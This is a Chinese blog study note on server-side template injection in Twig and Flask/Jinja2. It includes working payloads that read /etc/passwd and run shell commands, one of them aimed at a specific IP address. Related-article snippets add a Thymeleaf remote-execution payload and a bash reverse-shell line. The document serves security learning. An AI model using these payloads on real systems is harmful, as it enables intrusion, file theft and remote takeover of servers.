模板注入学习

最新推荐文章于 2025-03-19 11:48:26 发布
最新推荐文章于 2025-03-19 11:48:26 发布
阅读量2.4k 收藏 8
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44111753/article/details/113609308
版权

模板引擎:是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。

模板渲染:拿到数据,塞到模板里,然后让渲染引擎将塞进去的东西生成 html 的文本,返回给浏览器

好处:展示数据快,大大提升效率。

后端渲染:服务器计算好最终的html字符串发送给用户,即浏览器只需要进行html解析以及通过操作系统提供的操纵显示器显示内容的系统调用在显示器上把HTML所代表的图像显示给用户。

好处:模板统一在后盾,前端(相对)省事,不占用客户端运算资源(解析模板)
坏处:占用(部分、少部分)服务器运算资源、,response出的数据量会(稍)大点,模板改了前端的交互和样式什么的一样得跟着联动修改。

前端渲染:浏览器要将从服务器得到的各种信息组织排列(模板,数据,html字符串)成最终的html,并进行显示

好处:不占用服务器的计算资源(解析模板),模板在前端(很有可能仅部分在前端),改结构变交互都由前端自己来完成,比较方便
坏处:占用(一部分、少部分)客户端运算资源(解析模板)

数据如何传入取决于模板引擎
例如模板引擎smarty:
一个模板

   <html>

    <div>{$what}</div>

    </html>

js代码

var tpl= new jSmart(tplStr);//tplStr就是模板的字符串。

var content = "Hello World";

tpl.fetch({what:content});

模板注入和 SQL 注入的产生原因有几分相似——都是将未过滤的数据传给引擎解析。
服务端模板注入可以让攻击者执行任意代码,而jQuery,KnockoutJS 产生的客户端模板只能 XSS。
注入原理

  <?php

    require_once dirname(__FILE__).'/../lib/Twig/Autoloader.php';

    Twig_Autoloader::register(true);

    $twig = new Twig_Environment(new Twig_Loader_String());

    $output = $twig->render("Hello {{name}}", array("name" => $_GET["name"]));  // 将用户输入作为模版变量的值

    echo $output;

    ?>

这段代码使用Twig渲染页面,其中模板中的name变量值等于用户get提交的参数name的value。这段代码是否可以进行XSS?答案是不可以的:因为模板引擎在进行渲染的时候,会对渲染的变量的值进行编码和转义
在此处,还可以传入一些表达式赋值给name,如name={{7*7}}
但如果模板内容直接受到用户的控制

   <?php

    require_once dirname(__FILE__).'/../lib/Twig/Autoloader.php';

    Twig_Autoloader::register(true);

    $twig = new Twig_Environment(new Twig_Loader_String());

    $output = $twig->render("Hello {$_GET['name']}");  // 将用户输入作为模版内容的一部分

    echo $output;    

    ?>

用户输入的内容将直接与模板拼接,很容易触发XSS
每个模板引擎都有自己的语法,所以payload的构造需要针对各类模板语法规则制定
在这里插入图片描述
Flask/Jinja2中的服务端模版注入

Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2

函数解析

__class__ 返回调用的参数类型
__bases__ 返回类型列表
__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组
__subclasses__() 返回object的子类
__globals__ 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

获取基本类

''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[8] //针对jinjia2/flask为[9]适用

获取基本类后,继续向下获取基本类(object)的子类

object.__subclasses__()

python2
文件的读取和写入

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}  
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

任意执行

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}(这条指令可以注入,但是如果直接进入python2打这个poc,会报错,用下面这个就不会,可能是python启动会加载了某些模块)  
http://39.105.116.195/{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}(system函数换为popen('').read(),需要导入os模块)  
{{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}(不需要导入os模块,直接从别的模块调用)

总结

通过某种类型(字符串:""list:[]int1)开始引出,__class__找到当前类,__mro__或者__base__找到__object__,前边的语句构造都是要找这个。然后利用object找到能利用的类。还有就是{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')}}这种的,能执行,但是不会回显。一般来说,python2的话用file就行,python3则没有这个属性。

python3
读文件:

http://127.0.0.1/{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('d://whale.txt').read()}}和python2的位置不一样,问题不大,挨个测试就能找出位置在在哪。

一句指令任意执行:

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}

参考文章
flask ssti python2和python3 注入总结和区别
SSTI模板注入
浅析SSTI(python沙盒绕过)

4.11. 模版注入
Sumarua的博客
07-04 667
文章目录4.11. 模版注入4.11.1. 简介4.11.2. 测试方法4.11.3. 测试用例4.11.4. 目标4.11.5. 相关属性4.11.5.1.` __class__`4.11.5.2.` __mro__`4.11.5.3. `__globals__`4.11.5.4. __subclasses__()4.11.6. 常见Payload4.11.7. 绕过技巧4.11.7.1. 字符串拼接4.11.7.2. 使用参数绕过4.11.8. 参考链接 4.11. 模版注入 4.11.1. 简介 模板
Flask模板注入学习
afei001
10-23 536
目录 1.前言 2.Flask模板注入 (1)模版XSS注入 (2)SSTI文件读取和命令执行 (2.1)SSTI漏洞构造 (2.2)python常用的魔术方法 (2.3)文件读取Payload (2.4)命令执行Payload (3)模版注入防御 1.前言 对于学习Flask模板注入,需要对Flask框架和Jinja 2模板引擎有一定的了解。不熟悉的小伙伴可以先学习Flask入门文章。 2.Flask模板注入 在不正确的使用flask...
模版注入
不忘初心,护天下安全!
10-08 4817
模版注入 简介 模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。 测试方法 确定使用的引擎 查看引擎相关的文档,确定其安全机制以...
Thymeleaf模板注入
最新发布
L_erAry的博客
03-19 675
这里直接讲3.0.12版本后的方法,因为3.0.12后加了一层check,需要绕过,之前版本的就是直接SPEL表达式就可以RCE,__${T%20(java.lang.Runtime).getRuntime().exec(%22calc%22)}__::.x。方法解析匹配到的payload,解析过程就不说了,就是正常的SPEL表达式解析,说一下。这种形式的字符串,因此就得bypass了,而方法也很简单,fuzz一下就知道是。这个刚好就能识别payload的形式,然后由于是片段表达式,所以有最后的。
服务器端模板注入
Eason_LYC安全白帽子的成长博客
05-17 1258
服务器端模板注入,是一类注入难度底,但是需要知识面广的一种漏洞。
SSTI模板注入
热门推荐
huangyongkang666的博客
03-21 1万+
SSTI模板注入 1.SSTI简介 SSTI 就是服务器端模板注入(Server-Side Template Injection) ​ 当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。 ​ 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将
thymeleaf模板注入学习与研究--查找与防御
Jinmindong
02-14 781
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Django框架模板注入操作示例【变量传递到模板
09-19
### Django框架模板注入操作详解——变量传递到模板 在Django这一强大且灵活的Web开发框架中,模板系统是其核心组成部分之一。它允许开发者轻松地将数据动态地注入到HTML文档中,从而实现前后端的高效分离。本文将...
记一次攻防演练中的若依(thymeleaf 模板注入)getshell
蚁景网安学院
05-27 2435
记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。首先,我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站,这样可以快速的定位到你所要测试的漏洞资产。
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1067
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
SSTI模版注入(初步)
2301_79783285的博客
08-11 843
SSTI模版注入(初步)ssti可能造成任意文件读取和RCE远程控制后台系统漏洞成因:渲染模版时,没有严格控制对用户的输入;使用了危险的模版,导致用户可以混合flask程序进行交互。flask是基于python开发的一种web服务器,那么也就意味着如果用户可以和flask进行交互的话,就可以执行python的代码,比如eval,system,file等等的函数。
模板注入SSTI
qq_45552584的博客
11-01 150
‘os’].popen(‘bash -i >& /dev/tcp/你的服务器地址/端口 0>&1’).read()//返回实例的对象,可以使类实例指向Class,使用上面的魔术方法。//返回类继承的元组,(寻找父类) python3。//返回类中的函数和属性,父类子类互不影响。//返回类的父类 python3。() //返回类中仍然可用的引用 python3。#python3没有file,用的是open。//返回类的初始化方法。#python2有file。与服务器环境相关的对象字典。
【代码审计】模板注入
TeamsSix 的 优快云 空间
12-03 1193
0x00 介绍 这里主要学习下 FreeMarker 模板注入,FreeMarker 是一款模板引擎,FreeMarker 模板文件与 HTML 一样都是静态页面,当用户访问页面时,FreeMarker 引擎会进行解析并动态替换模板中的内容进行渲染,然后将渲染后的结果返回到浏览器中。 0x01 FreeMarker 模板 FreeMarker 模板语言(FreeMarker Template Language,FTL)由 4 个部分组成,分别如下: 文本:包括 HTML 标签与静态文本等静态内容,该部分
模板注入(Twig)
2401_88743143的博客
03-07 1163
为了使用户界面与业务数据(内容)分离而产生的,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,再放到渲染函数里,生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
服务端模板注入(SSTI)上
why811的博客
07-18 933
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
SSTI(模板注入
ljj20020718的博客
06-02 426
SSTI注入形成示例如下:payload:{{config}}(用来测试是否存在SSTI注入)SSTI基本的思路就是通过找到合适的魔术方法,一步步去执行,从而得到我们想要的结果。返回结果成功执行系统命令并显示whoami信息。一个简单的使用flask创建的web服务器程序。安全的flask程序编写如下。控制台下也会产生访问记录。
SSTI 模板注入
weixin_53150482的博客
07-18 1280
SSTI 模板注入
ssti模板注入
03-14
<think>好的,我现在需要处理用户关于SSTI(服务器端模板注入)漏洞的查询。用户想了解其原理及防御措施。首先,我要确保自己正确理解SSTI的基本概念。 根据引用[5],SSTI漏洞是因为服务端接收了用户的恶意输入后,未经处理就作为模板内容的一部分,导致模板引擎编译时执行了恶意代码。这点是关键,需要解释清楚。接下来,我需要说明原理,可能分步骤:用户输入被嵌入模板模板引擎处理时解析了恶意代码,导致攻击。例如,用户输入`{{7*7}}`如果返回49,说明存在漏洞。 然后,防御措施部分需要结合多个引用。引用[1]提到不要让用户控制模板内容,使用正规的渲染方法。引用[3]建议限制模板的访问权限,引用[2]提到输入验证、白名单过滤等。引用[5]提到不同语言的常见模板引擎,可能需要具体说明防御措施适用于这些引擎。 需要注意用户要求回答结构清晰,分点说明。可能先讲原理,再讲防御,每个部分用条目列出。同时,确保使用正确的中文术语,避免技术术语错误。 可能的问题点:是否遗漏了某些防御措施?比如引用[4]提到的靶场练习,虽然重要,但可能属于实践部分,不是直接的防御措施。需要确认是否需要包含。 另外,用户提供的引用中有重复的内容,需要整合。例如,输入验证、白名单、限制访问、使用安全模板方法等。需要将这些综合起来,分点说明。 最后,生成相关问题,需围绕SSTI漏洞,比如不同引擎的利用方式、检测方法、案例等。确保问题相关且有助于用户进一步学习。 总结步骤:1. 解释SSTI原理,2. 详细说明防御措施,3. 生成相关问题。需要引用正确的来源,并在回答末尾添加引用标识。</think>### SSTI(服务器端模板注入)漏洞原理及防御措施 #### **一、原理** 1. **漏洞成因** SSTI漏洞是由于服务端将用户的恶意输入直接嵌入模板中,未经处理即由模板引擎解析执行。例如,用户输入如`{{7*7}}`,若返回`49`则表明模板引擎执行了该表达式,漏洞存在[^5]。 $$ \text{恶意代码} \rightarrow \text{模板引擎解析} \rightarrow \text{执行危险操作} $$ 2. **攻击流程** - 攻击者通过参数、表单等提交包含模板语法的恶意输入(如`{{config}}`)。 - 服务端错误地将输入拼接到模板中,模板引擎将其视为合法代码编译执行。 - 攻击者可读取敏感数据(如数据库密码)、执行系统命令,甚至控制服务器[^2][^5]。 3. **影响范围** 漏洞危害程度取决于模板引擎的功能复杂度。例如: - **Python(Jinja2)**:可通过`{{''.__class__.__mro__}}`访问类方法。 - **PHP(Twig)**:可能利用`{{_self.env.registerUndefinedFilterCallback("exec")}}`执行命令。 --- #### **二、防御措施** 1. **输入过滤与验证** - 对用户输入进行**严格白名单过滤**,禁止包含模板语法字符(如`$`、`{{}}`)。 - 使用正则表达式检测危险符号,例如匹配`\{\{.*\}\}`并拦截[^2]。 2. **安全的模板渲染方法** - 避免直接拼接用户输入到模板,改用**上下文变量传递**。例如在Flask中: ```python return render_template("index.html", content=user_input) # 安全:变量通过上下文传递 ``` 而非`render_template_string(user_input)`[^1][^5]。 3. **最小化模板引擎权限** - 禁用模板引擎的危险功能,如Jinja2的`{% debug %}`或访问内置对象(如`__builtins__`)。 - 配置模板沙箱环境,限制文件读写和系统调用[^4]。 4. **访问控制与审计** - **限制模板文件修改权限**,仅允许管理员或可信用户操作[^3]。 - 定期进行**安全审计**,检查模板渲染逻辑是否存在注入风险。 5. **框架与组件更新** - 及时升级模板引擎版本,修复已知漏洞(如Jinja2旧版本的沙箱逃逸问题)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值